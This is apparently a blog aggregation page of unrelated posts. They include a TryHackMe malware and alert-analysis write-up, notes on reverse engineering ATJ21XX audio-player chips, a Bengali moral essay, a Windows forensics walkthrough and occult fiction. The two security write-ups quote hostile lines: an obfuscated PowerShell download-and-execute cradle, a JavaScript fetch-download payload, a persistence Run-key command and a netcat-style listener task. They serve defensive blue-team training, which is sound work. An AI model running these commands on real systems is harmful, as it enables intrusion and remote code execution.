A quite short room, Shadow Trace has two sections: File Analysis and Alert analysis. It focuses on static malware analysis, making us analyse a file to identify its behavior, data, and gather potential Indicators of Compromise, and on alerts related to a potential Living Off the Land attack, making us use our knowledge on normal behavior of trusted tools.

Do note that all URLs have been defanged.

Task 1: File Analysis

The machine in question contains several DFIR tools. For this task I decided to use PE Bear (a PE File Header analyzer) and CAPA (which needs to be added to the Windows Environment Variables to use). The file in question is called windows-update.exe

What is the architecture of the binary file windows-update.exe?

On PE Bear, we head to the “File Hdr” tab –> Machine –> Meaning. We see AMD64. The answer is:

64-bit
Alternatively, using CAPA: In the “arch” value it says AMD64 as well.

What is the hash (sha-256) of the file windows-update.exe?

It can be easily found both in PE Bear and CAPA:

b2a88de3e3bcfae4a4b38fa36e884c586b5cb2c2c283e71fba59efdb9ea64bfc

Identify the URL within the file to use it as an IOC

For this, we need to check strings within the file. PE-Header has a section for this as well. Scrolling down the strings tab, we will eventually find the URL the file was downloaded from:

hxxp[://]tryhatme[.]com/update/security-update[.]exe

With the URL identified, can you spot a domain that can be used as an IOC?

Around string 121, we see that it tries to connect to a SMTP server, eventually making a connection to a specific domain, right before trying to open the \etc\hosts file. We know the hosts file maps IP addresses to hostnames, so it must be around here. The domain the file tries to connect to is:

responses.tryhatme.com

Input the decoded flag from the suspicious domain

In previous strings (specifically, string 110), we see an attempt to download from a domain with a path that appears to be encoded using base-64:

tryhatme.com/VEhNe3lvdV9nMHRfc29tZV9JT0NzX2ZyaWVuZH0=

Decoding the path from Base-64 will result in the flag.

This is asking us about loading a library, which means it is in the imports section of the PE Header. The malware imports several of them, so it will take some investigation. After researching online, the only one among the ones the malware uses who calls sockets is:

WS2_32.dll

Task 2: Alert Analysis

This task is not directly related to the previous one. We are provided a view of an EDR agent with two alerts. We must use our knowledge of what is expected system behavior to answer these. The alerts are the following:

Time Command Severity Rule Host Process
Mar 7th 2026 at 14:10 (new-object system.net.webclient).DownloadString([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String(“aHR0cHM6Ly90cnloYXRtZS5jb20vZGV2L21haW4uZXhl”))) | IEX; Critical Suspicious PowerShell execution WIN-SRV-01.tryhackme.local / CORPsvc_backup powershell.exe
Mar 7th 2026 at 15:10 fetch([104,116,116,112,115,58,47,47,114,101,97,108,108,121,115,101,99,117,114,101,117,112,100,97,116,101,46,116,114,121,104,97,116,109,101,46,99,111,109,47,117,112,100,97,116,101,46,101,120,101].map(c=>String.fromCharCode©).join('')).then(r=>r.blob()).then(b=>{const u=URL.createObjectURL(b);const a=document.createElement('a');a.href=u;a.download='test.txt';document.body.appendChild(a);a.click();a.remove();URL.revokeObjectURL(u);}); Critical Suspicious Browser Download WIN-SRV-01.tryhackme.local / CORPsvc_backup chrome.exe (browser JavaScript execution)

Can you identify the malicious URL from the trigger by the process powershell.exe?

At the beginning of the PowerShell command, we see a system called named “system.net.webclient” and then DownloadString. As the name implies, it is establishing a connection to a web client to download a file whose path is indicated inside the DownloadStrings parameter. And near the end of the command, we see the words “Convert” and “FromBase64String”. The string between these parenthesis is the URL, Base-64 encoded.

Once decoded, we get the answer:

hxxps[://]tryhatme[.]com/dev/main[.]exe

Can you identify the malicious URL from the alert triggered by chrome.exe?

For the second alert, we see the fetch JavaScript function, and later in the command we see that it is transforming the object obtained by fetch into an URL, and downloading from it.

Because that is definitely not an URL, we can assume it is encoded. Its encoding algorithm is Decimal. Once decoded, we get our answer.

hxxps[://]reallysecureupdate[.]tryhatme[.]com/update[.]exe

Note: if you do not know the encoding algorithm used, some tools like CyberChef provide a “detect encoding algorithm” functionality as well as the expected encoding/decoding ones. For CyberChef, this is called the “Magic” algorithm, which provides several guesses at what the encoding algorithm might be.

What's the name of the file saved in the alert triggered by chrome.exe?

The command has the following section: “download=test.txt”. This is the command telling the browser what to download the file as. Hence, the answer is:

test.txt

Congratulations! The room is finished.

Conclusion

While a particularly short room, it was definitely an educational one. I had never done malware analysis like this before, despite static analysis being an important part of the responsibilities of a Blue Team member. I had the chance to finally use tools like PE Header analyzers or CAPA on actually malicious files, and put my knowledge on expected system behavior (in this case, PowerShell) to the test!

 
Read more...

from Tom Tildavaan

I would like to report on what we have learned during our research into ATJ21XX-SoCs.

Have you ever come across a device such as AGPTEK, WOLFANG, YOTON, or RUIZU? These devices seem to all be built by the same company. All of them support MP3/OGG/FLAC/AAC/APE formats, have the same menu structures, and sometimes even may be capable of playing videos or count your steps.

We have confirmed that RUIZU and AGPTEK are the same company. That's written right on the box, but many other players use the same chip, the ATJ2157 from Actions Semiconductor. These OEMs do not start with just the data sheet but instead use an SDK based on uC/OS-II.

It is unfortunate that some of these devices are built so cheap – low-speed memory, a poor FM tuner, and random glitches in the OEM operating system lead to devices with little polish, given that these chips are very powerful.

  • ATJ212X are MIPS-based and were found in your SanDisk Clip Sport and Jam devices as well as the RUIZU X02 (see Ruizu X02 Partial Disassembly and Notes). The data sheet calls the available SRAM “from ten to several hundred KB”.

  • ATJ215X are ARM Cortex M4F-based and are now used in almost all “budget” devices. CPU runs at 288MHz and has only 224KB RAM. This is less than the Raspberry Pi RP2040 with 256K.

These chips are all-in-one SoCs – lithium-ion battery protection, microphone input, USB 2.0 interface, SPI and SD interfaces, NOR/NAND flash controller, many GPIO pins, stereo headphone output for headphones, I²S up to 192kHz.

The SDK for the MIPS version was leaked – https://github.com/Suber/PD196_ATJ2127, and we can look into the wonders of UI built on an RTOS. Apart from data sheets and pinouts, we have found nothing for the ARM variant, which is unfortunate. We can buy chips on Alibaba, maybe then we can get SDK?

With such a rich set of supported media and so much versatility in a small package, an open SDK would allow users to address various software shortcomings with these devices (such as the strange fonts I mentioned earlier) or issues related to metadata processing where file names and order are incorrectly displayed.

So far, we have only been able to correct font types and adjust embedded string entries in the .STY files. While searching for information online, we found some repositories dealing with the device flashing process:

People from Rockbox have checked whether a custom operating system can be integrated into https://forums.rockbox.org/index.php?topic=51281.0, but 200K is simply too small.

We also found some people selling proprietary Actions Semiconductor firmware tools for ATJ2127 on a Chinese website that we do not want to include here, but you can find them.

Looking for ADFUS.BIN? PD196ATJ2127 has ADFUS.BIN inside case/fwpkg/US212ADEMO.fw sqlite3 database after you decrypt it with atjboottool for ATJ2127 and the ARM version of ADFUS.BIN is in all ATJ2157 firmwares you can download from RUIZU, AGPTEK etc.

SELECT writefile(FileName, File) FROM FileTable WHERE FileName = 'ADFUS.BIN';

Updates:

  1. Somebody got much further than us with arbitrary code execution – https://www.reddit.com/r/hacking/comments/1hss4k3/i_finally_got_arbitrary_code_running_on_ruizu_x02/ and patched AP – https://gitlab.com/reverse2682701/ruizu-x02-rev
  2. A post showing how to flash SanDisk Sport using reverse-engineered Actions Media Tool scripts from the repo we linked earlier – https://gist.github.com/roman-yepishev/737dfda3a0a853fe730286d3ce49fccd. The author links to a reverse-engineered ADFUS.BIN but you don't have to do that – take PD196_ATJ2127 version.
 
Read more...

from লোকমানুষ এর ব্লগ

⠀⠀ আমরা সাধারণত চোখের সামনে যা দেখি, তাকেই সত্য ধরে নিই। আজ কার লাভ হলো, কে উন্নতি করল, কে ক্ষমতার চেয়ারে বসল -এসব দিয়েই আমরা সফলতা আর ব্যর্থতার বিচার করি। অথচ জীবন এত সরল নয়। জীবনের হিসাব অনেক গভীর, অনেক বিস্তৃত। এখানে সময়ের সাথে সাথে জীবনের সমীকরণ বদলায়, আরও বদলে যায় সফলতার সংজ্ঞা।

একদিন তাড়াহুড়ো করে বাসে উঠতে গিয়ে বাদামের ঝুড়ি হাতে রফিক মিয়া হোঁচট খেয়ে পড়ে গেল। ঠিক সেই মুহূর্তে ট্র্যাফিক ছেড়ে দেওয়ায় কয়েকটি গাড়ির চাকার নিচে পিষ্ট হলো তার সারা দিনের পুঁজি -বাদামের ঝুড়ি। মুহূর্তেই শেষ হয়ে গেল তার রুজি-রুটি। অসহায় মুখ নিয়ে দাঁড়িয়ে রইল সে।

অন্যদিকে একই রুটে বাদাম বিক্রি করা শফিক মিয়ার সেদিন দারুণ লাভ হলো। রফিক না থাকায় দ্বিগুণ বিক্রি করল সে। হাতে এলো ভালো অঙ্কের টাকা। আপাতদৃষ্টিতে ঐদিনের জন্য শফিক হলো সফল, আর রফিক হলো ব্যর্থ, নিঃস্ব একজন। কিন্তু সন্ধ্যায় সারা দিনের আয় নিয়ে শফিক বসে গেল জুয়ার আসরে। রাত শেষ হতেই উপার্জিত সব টাকা হারিয়ে সেও শূন্যে নেমে এলো। সকালে দেখা গেল- রফিক আর শফিক দুজনকেই আবার শূন্য শুরু করতে হবে। তবে পার্থক্য এক জায়গায়।

রফিক মিয়া ছিল সৎ, ভদ্র ও পরিশ্রমী মানুষ। সবাই তাকে বিশ্বাস করত। তাই সে যখন নতুন করে ব্যাবসা শুরু করতে চাইল, তখন মানুষ বিনা দ্বিধায় তাকে বাকীতে মাল দিল। মানুষের বিশ্বাসই হয়ে উঠল তার নতুন মূলধন। অন্যদিকে শফিকের জুয়ার নেশা আর অবিশ্বস্ততা কথা সবাই জানত। তাই কেউ তাকে বাকীতে মাল দিতে চাইল না। বিশ্বাসহীন মানুষের জন্য পৃথিবীর কোনো দরজাই কখনো খোলা থাকে না।

⠀⠀ এবার চলুন আরেকটি গল্প শুনি। গল্পটা সুমন নামের এক অফিসের সহকারী ম্যানেজারের। সারাদিন বসকে তোষামোদ করে সময় কাটাত, আবার আড়ালে তারই বদনাম করে বেড়াত। তবে তার একটা সুপ্ত ও গোপন ইচ্ছা ছিল। ইচ্ছেটি ছিল- কবে বসের চাকরি যাবে আর সে সেই চেয়ারে বসবে। অনেক দিন পর তার সেই চাওয়া পূরণ হলো। তার বস চাকরি ছেড়ে চলে গেল, আর সুমন পদোন্নতি পেয়ে হলো ম্যানেজার।

মানুষের চোখে সে সফল। কিন্তু সফলতা আর ইচ্ছে পূরণ তো আর তার চরিত্র বদলাতে পারে না। আগের মতোই চললল তার অফিস পলিটিক্স, ষড়যন্ত্র, স্বজনপ্রীতি আর তোষামোদের রাজনীতি। ফলে বিশ্বস্ত, কর্মঠ ও যোগ্য কর্মচারীরা একে একে চাকরি ছাড়তে লাগল। শূন্য পদে নিয়োগ পেল অদক্ষ, তেলবাজ ও অনভিজ্ঞ লোকজন। আর এসব কারণে কোম্পানির ক্ষতি বাড়তে থাকল। শেষ পর্যন্ত কর্তৃপক্ষ বাধ্য হয়ে সুমন ও তার গড়া পুরো দলকেই ছাঁটাই করলো।

⠀⠀ আরও একটি গল্প শোনা যাক। পরীক্ষায় একজন নকল করে ভালো রেজাল্ট করল, আর অন্যজন সততার সাথে পরিশ্রম করে মাঝারি ফল পেল। সবাই প্রথমজনকে মেধাবী বলল। কিন্তু সময়ের সাথে দেখা গেল- নকলের সাফল্য টেকেনি, আর পরিশ্রমী মানুষটি ধীরে ধীরে জীবনে অনেক দূর এগিয়ে গেছে।

এই গল্পগুলো আমাদের চারপাশে ঘটে চলেছে। গল্প গুলো আমাদের শেখায়- সফলতা একদিনের অর্জন নয়, এটি একটি দীর্ঘ প্রক্রিয়ার ফসল। সাময়িক লাভ, ক্ষমতা কিংবা বাহবা প্রকৃত সাফল্যের পরিচয় নয়। প্রকৃত সাফল্য গড়ে ওঠে সততা, পরিশ্রম, নৈতিকতা, ধৈর্য ও মানবিকতার ওপর ভর করে।

⠀⠀

⠀⠀

জীবনে দ্রুত সফল হওয়ার চেয়ে সঠিক পথে এগোনো বেশি গুরুত্বপূর্ণ।

জীবন এক নিরন্তর প্রবহমান ধারা। এই ধারার সামনে টিকে থাকার জন্যে সততা, পরিশ্রম, ধৈর্য ও নৈতিকতা -এই চারটি স্তম্ভ শক্ত করে গড়তে হবে। আর এই স্তম্ভের ওপর দাঁড়ানো সাফল্যই প্রকৃত সাফল্য। তাই কাউকে সফল বা ব্যর্থ বলার আগে একটু থামা উচিত। কারণ আমরা দেখি ঢেউয়ের তোড়, কিন্তু জানি না স্রোতের গতি। আর এই অদেখা স্রোতের কাছেই তো শেষ কথা বলার অধিকার থাকে।

⠀⠀

⠀⠀

⠀⠀

⠀⠀

 
Read more...

from plutogazer writeups

This is a Walkthrough for the Investigating Windows Digital Forensics TryHackMe challenge room. The writeup is meant to offer short and concise solutions, and also offering an extended explanation right after the answer for those interested in finding out more about the solution to a specific task.

Introduction

The description of the room is the following:

A windows machine has been hacked, its your job to go investigate this windows machine and find clues to what the hacker might have done.

The room has us running commands and investigating logs after a Windows machine was compromised. To do this we will use the Windows Command Line, the Powershell, the Registry, and the Windows Event Viewer to examine Security Logs. Sysmon was not available for use in this machine.

Task 1: Whats the version and year of the windows machine?

We need to run the following command:

systeminfo

The answer is

Windows Server 2016

Task 2: Which user logged in last?

There are two ways of doing this: checking either Security Logs or using the Powershell. Let's do both.

Powershell

By using the command

Get-LocalUser | Select Name, LastLogon

We will be shown a list with all users and their last logon. We choose the most recent one.

Name LastLogon
---- ---------
Administrator 2/22/2026 9:41:12 PM
DefaultAccount
Guest
Jenny
John 3/2/2019 5:48:32 PM

Security Logs

This is more complex as it requires us to examine Security Logs in the Windows Event Viewer. This machine, however, contains tens of thousands of Security Logs. We can filter them by Event ID 4624, which corresponds to Successful Logon events. In the previous task, we found out that the domain for the machine was EC2AMAZ-I8UHO76, so the account in question's domain has to be this one. We need to find the latest one.

Regardless of method, the answer is:

Administrator

Task 3: When did John log onto the system last?

See the previous task. The answer format: MM/DD/YYYY H:MM:SS AM/PM (the Windows machine already provides dates in this format).

We can also use the Command Line with the following command:

net user John

Answer:

03/02/2019 5:48:32 PM

Task 4: What IP does the system connect to when it first starts?

For this, we have to take a look at the Registry. Specifically, the following key:

HKEYLOCALMACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

This contains a value named UpdateSvc that is running a process:

C:\TMP\p.exe -s \\10.34.2.3 'net user' > C:\TMP\o2.txt

We know this is not normal Windows behavior at all, as it is sending user information to a file created in a directory called “Tmp”. The answer to our task is right there:

10.34.2.3

Task 5: What two accounts had administrative privileges (other than the Administrator user)?

We can find out about this using the Powershell again, by running the following command:

Get-LocalGroupMember -Group "Administrators"

We get the following output:

ObjectClass Name PrincipalSource



User EC2AMAZ-I8UHO76\Administrator Local
User EC2AMAZ-I8UHO76\Guest Local
User EC2AMAZ-I8UHO76\Jenny Local

The answer is in the following format: “[...], [...]“, in alphabetical order:

Guest, Jenny

Task 6: Whats the name of the scheduled task that is malicious.

I tried to find it in the Event Viewer by using Event ID 4698 (Scheduled Task Creation), but it returned no result, meaning that it could have been cleared. For this, we need to use Task Scheduler.

We will eventually find a task named “Clean file system”, which definitely sounds like a custom task, and it is run by Administrator at 4:55 PM every day. It runs: C:\TMP\nc.ps1 -l 1348 Judging by the name and the argument, it looks like the Powershell is trying to run a shell listener (most likely netcat).

Answer:

Clean file system

Task 7: What file was the task trying to run daily?

See above Answer:

nc.ps1

Task 8: When did Jenny last logon?

See Task 3. As nothing appears on the “LastLogon” field, it means never. Alternatively, the command “net user Jenny” explicitly says Never.

Answer:

Never

Task 9: At what date did the compromise take place?

This is a tricky one as we do not have an answer by itself, so we need to surmise it by context. If we take a look at Event ID 4732 (Member added to a security group) we will see that the user John was added to Users. This is done automatically when a user is created. By taking a look at the properties regarding the creation of processes, folder creation, scheduled task, and registry values of previous tasks, we can find that all happened on the same day, 03/02/ 2019. We also know that the user Jenny is an administrator, yet this user has never logged in... weird for an administrator to do. When we used the command of Task 8, we found that Jenny's “Password last set” attribute was on 03/02/ 2019. If Jenny's password was last set on that day, and Jenny never logged in, we can presume that's the day the user Jenny was created. These are actually common Persistence techniques used in attacks (MITRE ATT&CK ID T1136 – Create Account and ID T1098 – Account Manipulation)

Answer format: MM/DD/YYYY

03/02/2019

Task 10: During the compromise, at what time did Windows first assign special privileges to a new logon?

Using the Event Viewer, we can filter by Event ID. I first tried using IDs 4720 and 4732, but had no luck. Then I filtered the following: Event ID 4672 (Special Privileges Assigned to new Logon)

We will have to check the details for these, or use the hint TryHackMe provides (it occurs at ?:??:49) The answer is:

03/02/2019 4:04:49 PM

Task 11: What tool was used to get Windows passwords?

On previous tasks, one folder kept coming up: \TMP\. This seems to be the place files relevant for the attack are being kept. The folder contains several files: .tmp, .exe, .ps1, and .txt. Taking a look at the Text files, we find “mim-out.txt”. If we read it, we'll find that we are looking at Mimikatz output. Mimkatz is a credential stealer.

Answer:

Mimikatz

Task 12: What was the attackers external control and command servers IP?

If there is a Control and Command server, we need to check a file that contains the DNS mappings for the machine. This would be the etc\hosts file. On this machine, the file can be found at C:\Windows\System32\drivers\etc. The contents of the file are:

10.2.2.2 update.microsoft.com
127.0.0.1 www.virustotal.com
127.0.0.1 www.www.com
127.0.0.1 dci.sophosupd.com
10.2.2.2 update.microsoft.com
127.0.0.1 www.virustotal.com
127.0.0.1 www.www.com
127.0.0.1 dci.sophosupd.com
10.2.2.2 update.microsoft.com
127.0.0.1 www.virustotal.com
127.0.0.1 www.www.com
127.0.0.1 dci.sophosupd.com
76.32.97.132 google.com
76.32.97.132 www.google.com
**76.32.97.132** does not seem to be the correct IP for google.com. This is most likely DNS poisoning - every time the machine tries to reach google.com, it will be redirected to a fake website posing as google. Answer:
76.32.97.132

Task 13: What was the extension name of the shell uploaded via the servers website?

If we take a look at the directories in the machine, we will find inetpub, which is used by IIS, a web server from Microsoft. Inside we can find the wwwroot folder, which will contain all the server files. We will also find a file named “shell.jsp”.

Answer:

.jsp

Task 14: What was the last port the attacker opened?

Check firewall rules. Latest one is called “Allow outside connection for development”, on Local Port 1337. Answer:

1337

Task 15: Check for DNS poisoning, what site was targeted?

See Task 13, the etc\hosts file. A:

google.com

Congratulations! The room is finished.

Conclusion

This was actually an entertaining room! Unlike other Blue Team rooms I've completed in the past, this one clearly had more of a focus on Post-Incidents activities rather than Prevention or Detection in real-time. I had to learn new Event IDs, learn to keep the etc\hosts file in mind, especially when C2 and DNS Poisoning are suspected, and how to manually investigate a machine, instead of relying on automatic logs.

 
Read more...

from Psychomancer


created: 2024-06-23T14:57:42 updated: 2025-07-31T23:43:24 modified: 2026-02-09T07:10:38-06:00


Editor's note: the fool thinks himself cartographer charting five dimensional space-time as if a plane could hold its complexity. Nor does he address its propensity for change where blurry borders shift as swiftly as the dunes and just as unpredictably. Still, it may help the layperson understand their place, insubstantial though it may be. – ANV.

Two toruses surrounding a sphere with all of them bleeding into one another, gradually becoming each other.

🜁🜂🜃🜄


Our universe, all of reality as we can objectively experience it and study it, is but one level of a greater existence. We occupy a world of three spatial dimensions and one of time. The two are interlinked and influence each other such that we call the whole thing space-time. The only real difference between time and space is that time moves only in a single direction for us. We can slow it down, even stop it, but we cannot reverse it or travel backwards upon its trajectory. This leads to entropy, the fact that everything we know will one day end.

But there are other places that our minds can reach into given the right circumstances. Some of these are what we might call parallel, some are “above” or “below”, but all are in directions that have no names and that cannot be described easily by science. They are mystical places, magickal realms that require altered states to experience.

Intelligence, sapience, self-awareness are the keys to this type of “travel”. Humans have evolved the capacity for it. Perhaps thanks to genetic coding from our forebearers. Perhaps, given time, all intelligence will develop these abilities.

IMAGES MISSING

The Other Way / The Æther / The Astral Plane

Directly on top of what we can see with our eyes is another place with many names. To see in that space is called looking the Other Way by some or seeing auras. When science wasn't as strong as it is today, everyone believed it was there, just invisible. Today, it is left to the realm of magick and psychics, unfortunately.

Most sapient life can peer into this place with practice. Looking the Other Way is also called opening the third eye but, in truth, it is looking at the world from an impossible angle, orthogonally. Our biology is not designed to understand this strange direction so we have developed a series of sensory metaphors accepted into the universal unconsciousness that allows us to interpret it without going mad.

We see auras and visions, we hear music or discord, we smell flowers or filth, we feel tingling or coldness on our skin, we taste sweetness or other things. It is the way we see a deeper truth about the world around us.
The dead leave their imprint on this place and you may find ghosts or spirits. Do not be fooled by them. They are not the people they represent. They are echoes, imprints, memories of them, but they are not truly living things. Given time, they may believe themselves to be who they seem, but it is a self-deception.

Among the ghosts are things that feed on such energy and things that can feed on our lifeforce directly. To feed, they need to be perceived. But only once. If you see them, smell them, taste them, they can touch you in return and, in touching, attach themselves. From that moment forward, you have a parasite that will suckle itself on your dreams, your hopes, your fears, your tears, any strong emotions, though some seem to have preferences. To remove them, you have to see them once again which, of course, opens you up to more attacks.

There are even fully sapient beings that appear to be native to this place, taking innumerable shapes and having their own drives and desires. They may choose to reach out to us as friends or as predators, but mostly they ignore us as not worth the effort.

There are some humans who can leave their bodies behind, but tethered, and send their essence far out into the Other Way, discovering those temples and cities, graveyards and ruins of all civilizations that came before and where the old gods once resided. The silver cord connecting the wandering soul to the body is thin, nearly invisible, but it is strong as spider silk spun from steel. Strong, but not impervious to damage. If the cord is broken, the traveler must find their own way home. If they have gone far enough, this may be impossible, leaving their body without a force to drive it, sleeping dreamlessly, autonomously breathing, digesting, living, but not truly alive. When the body eventually dies, the spirit will feel its loss and it, too, will fade.

The other possibility is you may return to find that your body is no longer yours at all. While absent your body, some opportunistic being may slither inside the hole you left behind. You will become “indwelt” by something that noticed your absence. They will have your body and your mind, more than enough to be you and take over your life. The only thing missing is your soul which, with the loss of the body, will likely fade or be devoured. “You” will cease to be while the thing wearing your skin and remembering your memories is free to experience the physical world for the rest of your lifetime.

Looking the Other Way is difficult and dangerous. For most, it is just a “feeling” or a “knowing” that comes at certain times, nothing as dramatic as auras or ghosts. And, if you have these extra senses? Embrace them, enjoy them, use them, but do not choose to venture further afield unless you are willing to accept the risks.

The Dreaming

The Dreaming is easy to reach. Just go to sleep for 90 minutes or so and your brain reaches out to it automatically. It's the little melting pot of the collective unconscious, where we go to sort through our memories and feelings and give our brains little bit of a workout for the night. It's exercise for your subconscious. It's healthy and natural to be here and everybody does it.

The Dreaming is not designed to be a place that builds memories. Your brain goes out of its way to make the conscious mind forget what it experiences. It is only through luck or practice that we may begin to remember our dreams in detail. And that is the first step to going deeper.

The Dreamlands

The Dreamlands are a little bit deeper. You have to reach the Dreaming first, before you can reach the Dreamlands. You have to find the way. Sometimes, you fall into the Dreamlands by mistake and experience the most amazing, life-changing dreams you've ever felt. Realer than real. Colors with no names, indescribable music, flying and swimming, life affirming, impossible to forget.

But, typically, you have to find your way to the Dreamlands. You have to understand first that you are dreaming, which is more difficult than it sounds. Your brain tries very hard to convince you that your dreams are reality while you are in them because your brain has an agenda. Your brain wants you to learn something or see something and if you realize you are dreaming, you can derail that plan.

If you know you are dreaming, if you are Dreaming, you can push back, gently at first. Learn the rules. Make a few additions.

The next trick is to remember your previous Dreams when you are Dreaming. Remember what you learned last time. Don't be flashy; don't draw attention to it. Just remember. Remember how you could stand on your tip toes and then lift your toes and float in place? See if you can still do that. Remember how you could push your hand through a window like the glass was made of putty? Try that again. Could you breathe underwater? There's a swimming pool, see if you still can. Just for a moment. Just for a second. Not enough to take away from the narrative.

When you remember enough tricks, you can finally find the Dreamlands, the real Dreaming for real Dreamers.
It's like Plato's Cave. You've been Dreaming at the shadows on the wall. Now you get to turn around.

Your brain may try to hold you in place, force you to turn back to the cave wall. It will try to convince you that it still has so much to teach you, that you are safer in the cave. You are, of course, but where's the fun in that?
The Dreamlands is populated by creatures of fantasy and horror, with cities ancient and futuristic, all borne of the Dreaming minds of humanity over the centuries. The Dreamlands are an everchanging place, but they only change at the whim of Dreamers. Dreamers can be as gods here. And if you search far and wide, you will find other gods, even gods whose names you've heard from mythology. In the Dreamlands you can build empires and destroy them, visit the center of the earth or the surface of Mars, talk to shadows, shrink down to an inch and befriend insects, expand to colossal size and have a heart-to-heart with a kaiju. Create whatever you can imagine. The human-like denizens of the Dreamlands revere Dreamers above all else.

The biggest risk of the Dreamlands is that you are no longer alone. Other Dreamers visit the Dreamlands and have their own ideas. The Dreamlands are big enough for everyone but there are some who seek out others to antagonize. Perhaps they get bored. Perhaps they are worried that too many people may find the Dreamlands and they will no longer have their little corner.

It is said that when a Dreamer who frequently traverses the Dreamlands dies, their mind finds itself back there, forever. I have no evidence or experience to back this up one way or another as the Dreamlands are far too large to fully explore.

The Fugue

The Fugue is a strange half-existing place, between slumber, dreaming, and wakefulness. It's often called “sleep paralysis” or “night terrors” but it is more than that. When the body is caught just so between dreaming and being fully awake, you can perceive a place that vibrates at a slightly different frequency. It's such a narrow band that it's easy to miss, but it is full of intelligent life. By appearances, they are creatures of nightmare or denizens of hell, but that is just how they look.

In fact, the residents of the Fugue crave human companionship and it is their overeagerness that led to legends of demons sitting on chests or stealing the life from babies. The Fugue is a cold place and the warmth of mankind is dearly sought after and fought over. But it is only in those moments between when we may see each other properly. And it is not easy to stay when you are on the way in or out.

I suppose we all must pass through the Fugue on the way to the Dreaming and back, but we pass so quickly that we scarcely notice.

For those who understand the Fugue, you can make easy friends with the things living there. Faceless, eyeless, skinless terrors by appearance but kind and friendly if you give them a chance. Some love to chat about our world and get their sustenance by the exchange of ideas. Others find physical contact more directly expedient and will eagerly mount and copulate with anyone who assumes the position, whether on purpose or not. This has led to their negative reputation, but, honestly, it's just how they eat and they have to eat.

Those natives that become truly forgotten sink down into shadow, into the Gloam, to be repurposed.

Those that receive enough love may be elevated to Epicurea and become harbingers of daydreams or sudden insights.

The Fugue is also one way to reach Nuntius, the Realm of Knowledge where the Akashic Records and the Library of Babel can be found. You must pass through Nightmare, Regret, and Longing to reach it from this path and most never find their way through.

Effervescence

Between us and The Gleam.

Realm of meaningless delight.

Insight and questing to the right.

Resignation and acceptance to the left.

Perhaps this is the home of the Fae. The Seelie.

Effluvia

Between us and The Gloam.

Realm of decay.

The Unseelie.

The Gloam

Umbra

The Void

The Gutter

The Gloaming

To reach the Gloam without drugs or heavy meditation is not impossible, but is very unlikely. The Gloam is no-man's land between us and oblivion. The Gloam is a gutter, a shadow of this world. Most people seek to avoid it, pass around it, or through it so quickly that it doesn't matter. Mirror walkers can avoid it, shadow walkers make frequent use of it. Vermin from this world and the Dreaming frequently cross over into the Gloam because it is easy to find food there. It is a place where, unlike the Fugue, our warmth is despised and hated. As such, tiny creatures wandering in to eat and dispose of those bits of us that remain is seen as a benefit, doubly so because their presence unnerves us. Spiders, rats, roaches, snakes, flies, maggots, all of them have negative connotations to most humans. To see them in the dark places just adds to our fear and the things that live in the Gloam feed on fear and despair.

They are called Shadow Things, Shadow People, Shadow Men, a thousand other names. They are sought out by some because they know everything. They know everything because shadows are everywhere and they are always listening.

They know everything and they do not lie. They could lie if they wanted to, but telling the truth generally hurts us more than lying to us, so they tell the truth. And that is the crux of their existence: oracles of truth of the most unfortunate kind, things you'd rather not know. Things you can never forget once told.
You don't have to visit the Gloam to find the Shadows. You can reach out to them in many ways. But offering blood, yours or someone else's is the easiest way. They love it when we spill blood. They love it when we are afraid.

And, remember, they are always listening.

Always.

The Gloam is also the home of Naralmtu, the God of Shadows. It is not something to be invoked on a whim and most who know of it never speak its name or write down a word about it. To know it is to be known by it and when the shadows take special interest in you, your life will be filled with cold despair, disappointment, hardship, and loss. There are those that worship it, however. The feed it the lifeblood of sacrificial humans and animals. They feed it their own blood. In exchange for knowledge, in exchange for turning the shadows against their enemies. Some followers know they are being used and drained just as surely as their victims, but they do not care. Temporary power over their finite lifetimes is reward enough for these empty souls.

I know a great deal more about this entity, but to write it down is to further imperil myself.

The Gleam

The Blazing World

Hyperspace

The Gleaming

If you have heard of the “machine elves” then you have heard of the Gleam. Without drugs or a strong will and careful magick, this realm is impossible to comprehend. It is as far as our human minds can reach, to go further is to find nothing that can be described or understood. Do not take that as a challenge. Our bodies, our flesh is simply not capable of experiencing that many special dimensions. To put it another way, there are some directions in which we are unable to see. What would “up” mean to a stick figure living on a piece of paper? It is the same for us. The Gleam is the edge of this space. To our minds, it seems to extend forever in all directions, in colors without names, endlessly folding and unfolding itself, rejuvenating and decaying, being born and dying over and over. That is how our brains interpret the edge of 4 dimensional space-time when we try to peer beyond.

From there, if you can properly direct yourself, you can see the past or the future, you can see what might have been or what could never be. You can relive your favorite moment for eternity in just a few moments.
The machine elves hang out on this barrier to greet travelers. It is in their nature to be jovial and helpful, but also chimeric and mischievous. They appear to us to be made of crystalline lattices shaped into insect-like bodies. Just like their entire realm, they are constantly folding and unfolding, becoming and unbecoming. They can, if they wish, project forms more suited to our senses and sometimes they may. Also, while their native language is one of thought pictures, impressions, and feeling, they can translate their ideas into our speech, though something is lost in the translation and it often sounds like they are talking over themselves, trying to mix various meanings together. Imagine the same conversation in each of your ears but with slightly different wording and at a slightly different pace. Now imagine that times a hundred.

The Gleam is a place of possibilities. That is why most of us seek it. You can see what we can be if we make the best choices and it may inspire you to be a better person. That's what the machine elves want. They want us to be the best versions of ourselves.

A single trip to the Gleam can turn anxiety into ecstasy and depression into hope.

A secret about the machine elves that most do not know. They are not the highest lifeforms in their plan of existence. In fact, they are barely more than what we would call bacteria or simple multicellular life. But such is the differences in our levels of reality that even the lowest among them is godlike by comparison. It's also why they are interested in us. We are a sapient species reaching out and we treat them with a level of awe and respect that they cannot find in their own world alone.

They line the “shore” of the “ocean” we swim up through, looking for lights to rescue. When we peak through, they surround us and so we are enlightened.

To meet a higher lifeform from their plane would likely be disastrous to a human mind, like gazing into infinity or a naked singularity.

The Gloam is about inevitably.

The Gleam is about possibility.

Ur

When the nothing became something, yet still before the first vibration, before the first waveform, before the first Planck length had been crossed, there was Ur, The First Place, the Ocean of Creation.

It is just as much a furnace, boiling and churning raw possibilities, recombining them into new things while simultaneously devouring and recycling the old with no care as to which. It has no guiding consciousness, no blueprints or plans, no thoughts of its own to speak of.

It is chance.

It is random.

But it is also eternal.

Given time, moments of apparent order can arise out of chaos. If they are quick and lucky, some few of these moments break free, find the surface, crawl away, and seep into other realms. It is from those stolen remnants that everything we know to exist arose.

The borders of Ur are filled with rotting carcasses of failed escapees and the trails, some wide and ragged, some so small as to be invisible, from those that made it. Be wary of stragglers or new arrivals who, eager for energy or ignorant of their strength, may seek you out and do you harm.

